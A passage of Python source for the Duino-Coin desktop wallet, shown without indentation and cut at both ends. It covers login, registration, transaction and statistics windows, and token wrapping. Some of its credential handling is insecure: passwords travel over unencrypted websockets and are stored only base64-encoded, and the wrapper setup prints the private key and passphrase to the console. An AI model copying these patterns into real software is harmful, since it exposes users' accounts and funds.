FOREGROUND_COLOR_SECONDARY = "#fdcb6e"
# Minimum transaction amount to be saved
MIN_TRANSACTION_VALUE = 0.00000000001
# Minimum transaction amount to show a notification
MIN_TRANSACTION_VALUE_NOTIFY = 0.5
# Resources folder location
resources = "Wallet_" + str(VERSION) + "_resources/"
ENCRYPTION_ITERATIONS = 100_000
config = ConfigParser()
wrong_passphrase = False
global_balance = 0
oldbalance = 0
balance = 0
unpaid_balance = 0
profitCheck = 0
curr_bal = 0
WS_URI = "ws://server.duinocoin.com:15808"
def install(package):
subprocess.check_call([sys.executable, "-m", "pip", "install", package])
execl(sys.executable, sys.executable, *sys.argv)
def get_duco_price():
global duco_fiat_value
jsonapi = get(
"https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duco-statistics/master/"
+ "api.json",
data=None)
if jsonapi.status_code == 200:
try:
content = jsonapi.content.decode()
contentjson = loads(content)
duco_fiat_value = round(float(contentjson["Duco price"]), 4)
except Exception:
duco_fiat_value = 0.003
else:
duco_fiat_value = 0.003
Timer(30, get_duco_price).start()
def title(title):
if osname == "nt":
system("title " + title)
else:
print("\33]0;" + title + "\a", end="")
sys.stdout.flush()
def _derive_key(
password: bytes,
salt: bytes,
iterations: int = ENCRYPTION_ITERATIONS) -> bytes:
kdf = PBKDF2HMAC(
algorithm=hashes.SHA256(),
length=32,
salt=salt,
iterations=ENCRYPTION_ITERATIONS,
backend=backend)
return b64e(kdf.derive(password))
def password_encrypt(
message: bytes,
password: str,
iterations: int = ENCRYPTION_ITERATIONS) -> bytes:
salt = secrets.token_bytes(16)
key = _derive_key(
password.encode(),
salt,
ENCRYPTION_ITERATIONS)
return b64e(
b"%b%b%b" % (
salt,
ENCRYPTION_ITERATIONS.to_bytes(4, "big"),
b64d(Fernet(key).encrypt(message))))
def password_decrypt(
token: bytes,
password: str) -> bytes:
decoded = b64d(token)
salt, ENCRYPTION_ITERATIONS, token = decoded[:16], decoded[16:20], b64e(
decoded[20:])
ENCRYPTION_ITERATIONS = int.from_bytes(ENCRYPTION_ITERATIONS, "big")
key = _derive_key(
password.encode(),
salt,
ENCRYPTION_ITERATIONS)
return Fernet(key).decrypt(token)
def get_string(string_name):
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file["english"]:
return lang_file["english"][string_name]
else:
return "String not found: " + string_name
def openTos(handler):
open_new_tab("https://github.com/revoxhere/duino-coin#terms-of-usage")
def openGitHub(handler):
open_new_tab("https://github.com/revoxhere/duino-coin")
def openWebsite(handler):
open_new_tab("https://duinocoin.com")
def openExchange(handler):
open_new_tab("https://revoxhere.github.io/duco-exchange/")
def openDiscord(handler):
open_new_tab("https://discord.com/invite/kvBkccy")
def openTransaction(hashToOpen):
open_new_tab("https://explorer.duinocoin.com/?search="+str(hashToOpen))
class LoginFrame(Frame):
def __init__(self, master):
super().__init__(master)
messagebox.showerror(title="Warning",
message=("CLI and GUI wallets are being deprecated in favor of the Web Wallet. "
+ "This app may not run properly."))
master.title("Login")
master.resizable(False, False)
TEXT_FONT_BOLD = Font(size=12, weight="bold")
TEXT_FONT = Font(size=12, weight="normal")
self.duco = ImageTk.PhotoImage(Image.open(resources + "duco.png"))
self.duco.image = self.duco
self.ducoLabel = Label(
self, background=FOREGROUND_COLOR,
foreground=FONT_COLOR,
image=self.duco)
self.ducoLabel2 = Label(
self,
background=FOREGROUND_COLOR,
foreground=FONT_COLOR,
text=get_string("welcome_message"),
font=TEXT_FONT_BOLD)
self.spacer = Label(self)
self.label_username = Label(
self,
text=get_string("username"),
font=TEXT_FONT_BOLD,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
padx=5)
self.label_password = Label(
self,
text=get_string("passwd"),
font=TEXT_FONT_BOLD,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
padx=5)
self.entry_username = Entry(
self,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR_SECONDARY)
self.entry_password = Entry(
self,
show="*",
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR_SECONDARY)
self.ducoLabel.grid(
row=0,
sticky="nswe",
pady=(5, 0),
padx=(5))
self.ducoLabel2.grid(
row=1,
sticky="nswe",
padx=(5))
self.label_username.grid(
row=4,
sticky=W,
pady=(5, 0))
self.entry_username.grid(
row=5,
sticky=N,
padx=(5))
self.label_password.grid(
row=6,
sticky=W)
self.entry_password.grid(
row=7,
sticky=N)
self.logbtn = Button(
self,
text=get_string("login"),
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR,
command=self._login_btn_clicked,
font=TEXT_FONT_BOLD)
self.logbtn.grid(
columnspan=2,
sticky="nswe",
padx=(5),
pady=(5, 1))
self.regbtn = Button(
self,
text=get_string("register"),
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR,
command=self._register_btn_clicked,
font=TEXT_FONT_BOLD)
self.regbtn.grid(
columnspan=2,
sticky="nswe",
padx=(5),
pady=(0, 5))
self.configure(background=BACKGROUND_COLOR)
self.master.bind(
"<Return>",
self._login_btn_clicked_bind)
self.pack()
def _login_btn_clicked_bind(self, event):
self._login_btn_clicked()
def _login_btn_clicked(self):
global username, password
username = self.entry_username.get()
password = self.entry_password.get()
if username and password:
soc = websocket.create_connection(WS_URI)
soc.recv().decode()
soc.send(bytes(
"LOGI,"
+ str(username)
+ ","
+ str(password),
encoding="utf8"))
response = soc.recv().decode()
response = response.rstrip("\n").split(",")
if response[0] == "OK":
passwordEnc = b64encode(bytes(password, encoding="utf8"))
with sqlconn(resources + "wallet.db") as con:
cur = con.cursor()
cur.execute(
"""INSERT INTO
UserData(username, password, useWrapper)
VALUES(?, ?, ?)""",
(username, passwordEnc, "False"))
con.commit()
root.destroy()
else:
messagebox.showerror(
title=get_string("login_error"),
message=response[1])
else:
messagebox.showerror(
title=get_string("login_error"),
message=get_string("fill_the_blanks_warning"))
def _registerprotocol(self):
emailS = email.get()
usernameS = username.get()
passwordS = password.get()
confpasswordS = confpassword.get()
if emailS and usernameS and passwordS and confpasswordS:
if passwordS == confpasswordS:
soc = websocket.create_connection(WS_URI)
soc.recv().decode()
soc.send(
bytes(
"REGI,"
+ str(usernameS)
+ ","
+ str(passwordS)
+ ","
+ str(emailS),
encoding="utf8"))
response = soc.recv().decode().rstrip("\n")
response = response.split(",")
if response[0] == "OK":
messagebox.showinfo(
title=get_string("registration_success"),
message=get_string("registration_success_msg"))
register.destroy()
execl(sys.executable, sys.executable, *sys.argv)
else:
messagebox.showerror(
title=get_string("register_error"),
message=response[1])
else:
messagebox.showerror(
title=get_string("register_error"),
message=get_string("error_passwd_dont_match"))
else:
messagebox.showerror(
title=get_string("register_error"),
message=get_string("fill_the_blanks_warning"))
def _register_btn_clicked(self):
global username, password, confpassword, email, register
root.destroy()
register = Tk()
register.title(get_string("register"))
register.resizable(False, False)
TEXT_FONT_BOLD = Font(
register,
size=12,
weight="bold")
TEXT_FONT = Font(
register,
size=12,
weight="normal")
tos_warning = get_string("register_tos_warning")
import textwrap
tos_warning = textwrap.dedent(tos_warning)
tos_warning = "\n".join(l for line in tos_warning.splitlines()
for l in textwrap.wrap(line, width=20))
duco = ImageTk.PhotoImage(Image.open(resources + "duco.png"))
duco.image = duco
ducoLabel = Label(
register,
background=FOREGROUND_COLOR,
foreground=FONT_COLOR,
image=duco)
ducoLabel.grid(
row=0,
padx=5,
pady=(5, 0),
sticky="nswe")
ducoLabel2 = Label(
register,
background=FOREGROUND_COLOR,
foreground=FONT_COLOR,
text=get_string("register_on_network"),
font=TEXT_FONT_BOLD)
ducoLabel2.grid(row=1,
padx=5,
sticky="nswe")
def colorLabelBlue(handler):
ducoLabel3.configure(foreground="#6c5ce7")
def colorLabelNormal(handler):
ducoLabel3.configure(foreground=FONT_COLOR)
ducoLabel3 = Label(
register,
background=FOREGROUND_COLOR,
foreground=FONT_COLOR,
text=tos_warning,
font=TEXT_FONT)
ducoLabel3.grid(
row=2,
padx=5,
sticky="nswe")
ducoLabel3.bind("<Button-1>", openTos)
ducoLabel3.bind("<Enter>", colorLabelBlue)
ducoLabel3.bind("<Leave>", colorLabelNormal)
Label(
register,
text=get_string("username").upper(),
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
font=TEXT_FONT_BOLD,
).grid(
row=3,
sticky=W,
padx=5,
pady=(5, 0))
username = Entry(
register,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR_SECONDARY)
username.grid(
row=4,
padx=5)
Label(
register,
text=get_string("passwd").upper(),
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
font=TEXT_FONT_BOLD,
).grid(
row=5,
sticky=W,
padx=5)
password = Entry(
register,
show="*",
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR_SECONDARY)
password.grid(
row=6,
padx=5)
Label(
register,
text=get_string("confirm_passwd").upper(),
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
font=TEXT_FONT_BOLD,
).grid(
row=7,
sticky=W,
padx=5)
confpassword = Entry(
register,
show="*",
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR_SECONDARY)
confpassword.grid(
row=8,
padx=5)
Label(
register,
text=get_string("email").upper(),
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
font=TEXT_FONT_BOLD,
).grid(
row=9,
sticky=W,
padx=5)
email = Entry(
register,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR_SECONDARY)
email.grid(
row=10,
padx=5)
self.logbtn = Button(
register,
text=get_string("register"),
activebackground=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
command=self._registerprotocol,
font=TEXT_FONT_BOLD)
self.logbtn.grid(
columnspan=2,
sticky="nswe",
padx=(5, 5),
pady=(5, 5))
register.configure(background=BACKGROUND_COLOR)
def loading_window():
global loading, status
loading = Tk()
loading.resizable(False, False)
loading.configure(background=BACKGROUND_COLOR)
loading.title(get_string("loading"))
try:
loading.iconphoto(True,
PhotoImage(file=resources + "duco_color.png"))
except Exception:
pass
TEXT_FONT = Font(loading,
size=10,
weight="bold")
TEXT_FONT_BOLD = Font(loading,
size=14,
weight="bold")
original = Image.open(resources + "duco_color.png")
resized = original.resize((128, 128), Image.ANTIALIAS)
github = ImageTk.PhotoImage(resized)
github.image = github
githubLabel = Label(loading,
image=github,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
githubLabel.grid(row=0,
column=0,
sticky=N + S + E + W,
pady=(5, 0),
padx=(5))
Label(
loading,
text=get_string("duino_coin_wallet"),
font=TEXT_FONT_BOLD,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(
row=1,
column=0,
sticky=S + W,
pady=(5, 0),
padx=5)
loading.update()
status = Label(
loading,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
text=get_string("loading_database"),
font=TEXT_FONT)
status.grid(
row=2,
column=0,
sticky=S + W,
pady=(0, 5),
padx=5)
loading.update()
def transactions_window(handler):
transactionsWindow = Toplevel()
transactionsWindow.resizable(False, False)
transactionsWindow.title(get_string("wallet_transactions"))
transactionsWindow.transient([root])
transactionsWindow.configure(background=BACKGROUND_COLOR)
TEXT_FONT_BOLD_LARGE = Font(
transactionsWindow,
size=14,
weight="bold")
TEXT_FONT = Font(
transactionsWindow,
size=12,
weight="normal")
Label(
transactionsWindow,
text=get_string("transaction_list"),
font=TEXT_FONT_BOLD_LARGE,
background=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR,
).grid(row=0,
column=0,
columnspan=2,
sticky=S + W,
pady=(5, 0),
padx=5)
Label(
transactionsWindow,
text=get_string("transaction_list_notice"),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=1,
column=0,
columnspan=2,
sticky=S + W,
pady=(5, 0),
padx=5)
listbox = Listbox(
transactionsWindow,
width="35",
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
listbox.grid(
row=2,
column=0,
sticky=S + W + N + E,
padx=(5, 0),
pady=(0, 5))
scrollbar = Scrollbar(transactionsWindow,
background=BACKGROUND_COLOR)
scrollbar.grid(
row=2,
column=1,
sticky=N + S,
padx=(0, 5),
pady=(0, 5))
for i in gtxl:
listbox.insert(END, gtxl[i]["Sender"] + " to " + gtxl[i]
["Recipient"] + ": " + str(gtxl[i]["Amount"]) + " DUCO")
def get_selection(event):
try:
selection = listbox.curselection()[0]
openTransaction(gtxl[str(selection)]["Hash"])
except IndexError:
pass
listbox.bind("<Button-1>", get_selection)
listbox.config(yscrollcommand=scrollbar.set, font=TEXT_FONT)
scrollbar.config(command=listbox.yview)
def currency_converter_calc():
fromcurrency = fromCurrencyInput.get(fromCurrencyInput.curselection())
tocurrency = toCurrencyInput.get(toCurrencyInput.curselection())
amount = amountInput.get()
# TODO
value = duco_fiat_value * float(amount)
result = get_string("result") + ": " + str(round(value, 6))
conversionresulttext.set(str(result))
calculatorWindow.update()
def currency_converter_window(handler):
global conversionresulttext
global fromCurrencyInput
global toCurrencyInput
global amountInput
global calculatorWindow
calculatorWindow = Toplevel()
calculatorWindow.resizable(False, False)
calculatorWindow.title(get_string("wallet_calculator"))
calculatorWindow.transient([root])
calculatorWindow.configure(background=BACKGROUND_COLOR)
TEXT_FONT_BOLD = Font(
calculatorWindow,
size=12,
weight="bold")
TEXT_FONT_BOLD_LARGE = Font(
calculatorWindow,
size=14,
weight="bold")
TEXT_FONT = Font(
calculatorWindow,
size=12,
weight="normal")
Label(
calculatorWindow,
text=get_string("currency_converter"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=0,
columnspan=2,
column=0,
sticky=S + W,
pady=5,
padx=5)
Label(
calculatorWindow,
text=get_string("from"),
font=TEXT_FONT_BOLD,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=1,
column=0,
sticky=S + W,
padx=5)
fromCurrencyInput = Listbox(
calculatorWindow,
exportselection=False,
background=BACKGROUND_COLOR,
selectbackground=FOREGROUND_COLOR,
border="0",
font=TEXT_FONT,
foreground=FONT_COLOR,
width="20",
height="13",
)
fromCurrencyInput.grid(row=2,
column=0,
sticky=S + W,
padx=(5, 0))
fromCurrencyInput.insert(0, "DUCO")
vsb = Scrollbar(
calculatorWindow,
orient="vertical",
command=fromCurrencyInput.yview,
background=BACKGROUND_COLOR,
)
vsb.grid(row=2,
column=1,
sticky="ns",
padx=(0, 5))
fromCurrencyInput.configure(yscrollcommand=vsb.set)
fromCurrencyInput.select_set(0)
fromCurrencyInput.event_generate("<<ListboxSelect>>")
Label(
calculatorWindow,
text=get_string("to"),
font=TEXT_FONT_BOLD,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=1,
column=3,
columnspan=2,
sticky=S + W,
padx=5)
toCurrencyInput = Listbox(
calculatorWindow,
exportselection=False,
background=BACKGROUND_COLOR,
selectbackground=FOREGROUND_COLOR,
border="0",
foreground=FONT_COLOR,
font=TEXT_FONT,
width="20",
height="13")
toCurrencyInput.grid(
row=2,
column=3,
sticky=S + W,
padx=(5, 0))
toCurrencyInput.insert(0, "USD")
vsb2 = Scrollbar(
calculatorWindow,
orient="vertical",
command=toCurrencyInput.yview,
background=BACKGROUND_COLOR,)
vsb2.grid(
row=2,
column=4,
sticky="ns",
padx=(0, 5))
toCurrencyInput.configure(yscrollcommand=vsb2.set)
toCurrencyInput.select_set(0)
toCurrencyInput.event_generate("<<ListboxSelect>>")
Label(
calculatorWindow,
text=get_string("input_amount"),
font=TEXT_FONT_BOLD,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=3,
columnspan=2,
column=0,
sticky=S + W,
padx=5)
def clear_ccamount_placeholder(self):
amountInput.delete("0", "100")
amountInput = Entry(
calculatorWindow,
foreground=FOREGROUND_COLOR_SECONDARY,
border="0",
font=TEXT_FONT,
background=BACKGROUND_COLOR,)
amountInput.grid(
row=4,
column=0,
sticky=N + S + W + E,
padx=5,
columnspan=2,
pady=(0, 5))
amountInput.insert("0", str(global_balance))
amountInput.bind("<FocusIn>", clear_ccamount_placeholder)
Button(
calculatorWindow,
text=get_string("calculate"),
font=TEXT_FONT_BOLD,
foreground=FOREGROUND_COLOR,
activebackground=BACKGROUND_COLOR,
background=BACKGROUND_COLOR,
command=currency_converter_calc,
).grid(row=3,
columnspan=2,
column=2,
sticky=N + S + W + E,
pady=(5, 0),
padx=5)
conversionresulttext = StringVar(calculatorWindow)
conversionresulttext.set(get_string("result") + ": 0.0")
conversionresultLabel = Label(
calculatorWindow,
textvariable=conversionresulttext,
font=TEXT_FONT_BOLD,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,)
conversionresultLabel.grid(
row=4,
columnspan=2,
column=2,
pady=(0, 5))
calculatorWindow.mainloop()
def statistics_window(handler):
statsApi = get(
"https://server.duinocoin.com"
+ "/api.json",
data=None)
if statsApi.status_code == 200: # Check for reponse
statsApi = statsApi.json()
miner_api = get(
"https://server.duinocoin.com"
+ "/miners.json",
data=None)
if miner_api.status_code == 200: # Check for reponse
miner_api = miner_api.json()
statsWindow = Toplevel()
statsWindow.resizable(False, False)
statsWindow.title(get_string("statistics_title"))
statsWindow.transient([root])
statsWindow.configure(background=BACKGROUND_COLOR)
TEXT_FONT_BOLD_LARGE = Font(
statsWindow,
size=14,
weight="bold")
TEXT_FONT = Font(
statsWindow,
size=12,
weight="normal")
Active_workers_listbox = Listbox(
statsWindow,
exportselection=False,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
border="0",
font=TEXT_FONT,
width="65",
height="8",)
Active_workers_listbox.grid(
row=1,
columnspan=2,
sticky=N + E + S + W,
pady=(0, 5),
padx=5)
i = 0
totalHashrate = 0
for threadid in miner_api:
if username in miner_api[threadid]["User"]:
rigId = miner_api[threadid]["Identifier"]
if rigId == "None":
rigId = ""
else:
rigId += ": "
software = miner_api[threadid]["Software"]
hashrate = str(round(miner_api[threadid]["Hashrate"], 2))
totalHashrate += float(hashrate)
difficulty = str(miner_api[threadid]["Diff"])
shares = (
str(miner_api[threadid]["Accepted"])
+ "/"
+ str(
miner_api[threadid]["Accepted"]
+ miner_api[threadid]["Rejected"]))
Active_workers_listbox.insert(
i,
"#"
+ str(i + 1)
+ ": "
+ rigId
+ software
+ " "
+ str(round(float(hashrate) / 1000, 2))
+ " kH/s @ diff "
+ difficulty
+ ", "
+ shares)
i += 1
if i == 0:
Active_workers_listbox.insert(
i, get_string("statistics_miner_warning"))
totalHashrateString = str(int(totalHashrate)) + " H/s"
if totalHashrate > 1000000000:
totalHashrateString = str(
round(totalHashrate / 1000000000, 2)) + " GH/s"
elif totalHashrate > 1000000:
totalHashrateString = str(round(totalHashrate / 1000000, 2)) + " MH/s"
elif totalHashrate > 1000:
totalHashrateString = str(round(totalHashrate / 1000, 2)) + " kH/s"
Active_workers_listbox.configure(height=i)
Active_workers_listbox.select_set(32)
Active_workers_listbox.event_generate("<<ListboxSelect>>")
Label(
statsWindow,
text=get_string("your_miners") + " - " + totalHashrateString,
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(
row=0,
column=0,
columnspan=2,
sticky=S + W,
pady=5,
padx=5)
Label(
statsWindow,
text=get_string("richlist"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(
row=2,
column=0,
sticky=S + W,
pady=5,
padx=5)
Top_10_listbox = Listbox(
statsWindow,
exportselection=False,
border="0",
font=TEXT_FONT,
width="30",
height="10",
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
Top_10_listbox.grid(
row=3,
column=0,
rowspan=10,
sticky=N + E + S + W,
pady=(0, 5),
padx=5)
num = 0
for i in statsApi["Top 10 richest miners"]:
Top_10_listbox.insert(num, i)
num += 1
Top_10_listbox.select_set(32)
Top_10_listbox.event_generate("<<ListboxSelect>>")
Label(
statsWindow,
text=get_string("network_info"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=2,
column=1,
sticky=S + W,
padx=5,
pady=5)
Label(
statsWindow,
text=get_string("difficulty")
+ ": "
+ str(statsApi["Current difficulty"]),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=3,
column=1,
sticky=S + W,
padx=5)
Label(
statsWindow,
text=get_string("mined_blocks")
+ ": "
+ str(statsApi["Mined blocks"]),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=4,
column=1,
sticky=S + W,
padx=5)
Label(
statsWindow,
text=get_string("network_hashrate")
+ ": "
+ str(statsApi["Pool hashrate"]),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=5,
column=1,
sticky=S + W,
padx=5)
Label(
statsWindow,
text=get_string("active_miners")
+ ": "
+ str(len(statsApi["Miners"])),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=6,
column=1,
sticky=S + W,
padx=5)
Label(
statsWindow,
text="1 DUCO "
+ get_string("estimated_price")
+ ": $"
+ str(statsApi["Duco price"]),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=7,
column=1,
sticky=S + W,
padx=5)
Label(
statsWindow,
text=get_string("registered_users")
+ ": "
+ str(statsApi["Registered users"]),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=8,
column=1,
sticky=S + W,
padx=5)
Label(
statsWindow,
text=get_string("mined_duco")
+ ": "
+ str(statsApi["All-time mined DUCO"])
+ " ᕲ",
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=9,
column=1,
sticky=S + W,
padx=5)
statsWindow.mainloop()
def wrapper_window(handler):
def Wrap():
amount = amountWrap.get()
print("Got amount:", amount)
print("pub key:", pub_key)
soc = websocket.create_connection(WS_URI)
soc.recv().decode()
try:
float(amount)
except Exception:
pass
else:
soc.send(bytes(
"LOGI,"
+ str(username)
+ ","
+ str(password),
encoding="utf8"))
_ = soc.recv().decode()
soc.send(
bytes(
"WRAP,"
+ str(amount)
+ ","
+ str(pub_key)
+ str(",placeholder"),
encoding="utf8"))
soc.close()
sleep(2)
wrapperWindow.quit()
try:
pubkeyfile = open(str(resources + "DUCOPubKey.pub"), "r")
except Exception:
messagebox.showerror(
title=get_string("wrapper_error_title"),
message=get_string("wrapper_error"))
else:
if TRONPY_ENABLED:
pub_key = pubkeyfile.read()
pubkeyfile.close()
wrapperWindow = Toplevel()
wrapperWindow.resizable(False, False)
wrapperWindow.title(get_string("wrapper_title"))
wrapperWindow.transient([root])
askWrapAmount = Label(
wrapperWindow,
text=get_string("wrapper_amount_to_wrap") + ":")
askWrapAmount.grid(row=0,
column=0,
sticky=N + W)
amountWrap = Entry(wrapperWindow,
border="0",
font=Font(size=15))
amountWrap.grid(row=1,
column=0,
sticky=N + W)
wrapButton = Button(wrapperWindow,
text="Wrap",
command=Wrap)
wrapButton.grid(row=2,
column=0,
sticky=N + W)
else:
messagebox.showerror(
title=get_string("wrapper_error_title"),
message=get_string("wrapper_error_tronpy"))
def unwrapper_window(handler):
def UnWrap():
pubkeyfile = open(str(resources + "DUCOPubKey.pub"), "r")
pub_key = pubkeyfile.read()
pubkeyfile.close()
passphrase = passphraseEntry.get()
privkeyfile = open(str(resources + "DUCOPrivKey.encrypt"), "r")
privKeyEnc = privkeyfile.read()
privkeyfile.close()
try:
priv_key = password_decrypt(privKeyEnc, passphrase).decode()
use_wrapper = True
except InvalidToken:
print(get_string("invalid_passphrase"))
use_wrapper = False
amount = amountUnWrap.get()
print("Got amount:", amount)
soc = websocket.create_connection(WS_URI)
soc.recv().decode()
try:
float(amount)
except Exception:
pass
else:
soc.send(bytes(
"LOGI,"
+ str(username)
+ ","
+ str(password), encoding="utf8"))
_ = soc.recv().decode()
if use_wrapper:
pendingvalues = wduco.functions.pendingWithdrawals(
pub_key, username)
# transaction wasn't initiated, but variable should be declared
txn_success = False
try:
amount = float(amount)
except ValueError:
print("Value should be numeric - aborting")
else:
if int(float(amount) * 10 ** 6) >= pendingvalues:
toInit = int(float(amount) * 10 ** 6) - pendingvalues
else:
toInit = amount * 10 ** 6
if toInit > 0:
txn = (
wduco.functions.initiateWithdraw(username, toInit)
.with_owner(pub_key)
.fee_limit(5_000_000)
.build()
.sign(PrivateKey(bytes.fromhex(priv_key))))
txn = txn.broadcast()
txnfeedback = txn.result()
if txnfeedback:
txn_success = True
else:
txn_success = False
if txn_success or amount <= pendingvalues:
soc.send(
bytes(
"UNWRAP,"
+ str(amount)
+ ","
+ str(pub_key)
+ str(",placeholder"),
encoding="utf8"))
soc.close()
sleep(2)
unWrapperWindow.quit()
try:
pubkeyfile = open(str(resources + "DUCOPubKey.pub"), "r")
pubkeyfile.read()
pubkeyfile.close()
except Exception:
messagebox.showerror(
title=get_string("wrapper_error_title"),
message=get_string("wrapper_error"))
else:
if TRONPY_ENABLED:
unWrapperWindow = Toplevel()
unWrapperWindow.resizable(False, False)
unWrapperWindow.title(get_string("unwrapper_title"))
unWrapperWindow.transient([root])
unWrapperWindow.configure()
askAmount = Label(
unWrapperWindow,
text=get_string("unwrap_amount"))
askAmount.grid(row=1,
column=0,
sticky=N + W)
amountUnWrap = Entry(
unWrapperWindow,
border="0",
font=Font(size=15))
amountUnWrap.grid(row=2,
column=0,
sticky=N + W)
askPassphrase = Label(
unWrapperWindow,
text=get_string("ask_passphrase"))
askPassphrase.grid(row=4,
column=0,
sticky=N + W)
passphraseEntry = Entry(
unWrapperWindow,
border="0",
font=Font(size=15))
passphraseEntry.grid(
row=5,
column=0,
sticky=N + W)
wrapButton = Button(
unWrapperWindow,
text=get_string("unwrap_duco"),
command=UnWrap)
wrapButton.grid(
row=7,
column=0,
sticky=N + W)
else:
messagebox.showerror(
title=get_string("wrapper_error"),
message=get_string("wrapper_error_tronpy"))
def settings_window(handler):
def _wrapperconf():
if TRONPY_ENABLED:
privkey_input = StringVar()
passphrase_input = StringVar()
wrapconfWindow = Toplevel()
wrapconfWindow.resizable(False, False)
wrapconfWindow.title(get_string("wrapper_title"))
wrapconfWindow.transient([root])
wrapconfWindow.configure()
def setwrapper():
if privkey_input and passphrase_input:
priv_key = privkey_entry.get()
print("Got priv key:", priv_key)
passphrase = passphrase_entry.get()
print("Got passphrase:", passphrase)
try:
pub_key = PrivateKey(
bytes.fromhex(priv_key)
).public_key.to_base58check_address()
except Exception:
pass
else:
print("Saving data")
privkeyfile = open(
str(resources + "DUCOPrivKey.encrypt"), "w")
privkeyfile.write(
str(password_encrypt(
priv_key.encode(), passphrase
).decode()))
privkeyfile.close()
pubkeyfile = open(
str(resources + "DUCOPubKey.pub"), "w")
pubkeyfile.write(pub_key)
pubkeyfile.close()
Label(wrapconfWindow, text=get_string(
"wrapper_success")).pack()
wrapconfWindow.quit()
title = Label(
wrapconfWindow,
text=get_string("wrapper_config_title"),
font=Font(size=20))
title.grid(row=0,
column=0,
sticky=N + W,
padx=5)
askprivkey = Label(
wrapconfWindow,
text=get_string("ask_private_key"))
askprivkey.grid(row=1,
column=0,
sticky=N + W)
privkey_entry = Entry(
wrapconfWindow,
font=TEXT_FONT,
textvariable=privkey_input)
privkey_entry.grid(row=2,
column=0,
sticky=N + W)
askpassphrase = Label(wrapconfWindow,
text=get_string("passphrase"))
askpassphrase.grid(row=3,
column=0,
sticky=N + W)
passphrase_entry = Entry(
wrapconfWindow,
font=TEXT_FONT,
textvariable=passphrase_input)
passphrase_entry.grid(row=4,
column=0,
sticky=N + W)
wrapConfigButton = Button(
wrapconfWindow,
text=get_string("configure_wrapper_lowercase"),
command=setwrapper)
wrapConfigButton.grid(row=5,
column=0,
sticky=N + W)
wrapconfWindow.mainloop()
else:
messagebox.showerror(
title=get_string("wrapper_error"),
message=get_string("wrapper_error_tronpy"))
def _logout():
try:
with sqlconn(resources + "wallet.db") as con:
cur = con.cursor()
cur.execute("DELETE FROM UserData")
con.commit()
except Exception as e:
print(e)
try:
execl(sys.executable, sys.executable, *sys.argv)
except Exception as e:
print(e)
def _cleartrs():
with sqlconn(resources + "wallet.db") as con:
cur = con.cursor()
cur.execute("DELETE FROM transactions")
con.commit()
def _chgpass():
def _changepassprotocol():
oldpasswordS = oldpassword.get()
newpasswordS = newpassword.get()
confpasswordS = confpassword.get()
if oldpasswordS != newpasswordS:
if oldpasswordS and newpasswordS and confpasswordS:
if newpasswordS == confpasswordS:
soc = websocket.create_connection(WS_URI)
soc.recv().decode()
soc.send(
bytes(
"LOGI,"
+ str(username)
+ ","
+ str(password), encoding="utf8"))
soc.recv().decode()
soc.send(
bytes(
"CHGP,"
+ str(oldpasswordS)
+ ","
+ str(newpasswordS),
encoding="utf8"))
response = soc.recv().decode().rstrip("\n").split(",")
soc.close()
if not "OK" in response[0]:
messagebox.showerror(
title=get_string("change_passwd_error"),
message=response[1])
else:
messagebox.showinfo(
title=get_string("change_passwd_ok"),
message=response[1])
try:
try:
with sqlconn(
resources + "wallet.db"
) as con:
cur = con.cursor()
cur.execute("DELETE FROM UserData")
con.commit()
except Exception as e:
print(e)
except FileNotFoundError:
pass
execl(sys.executable, sys.executable, *sys.argv)
else:
messagebox.showerror(
title=get_string("change_passwd_error"),
message=get_string("error_passwd_dont_match"))
else:
messagebox.showerror(
title=get_string("change_passwd_error"),
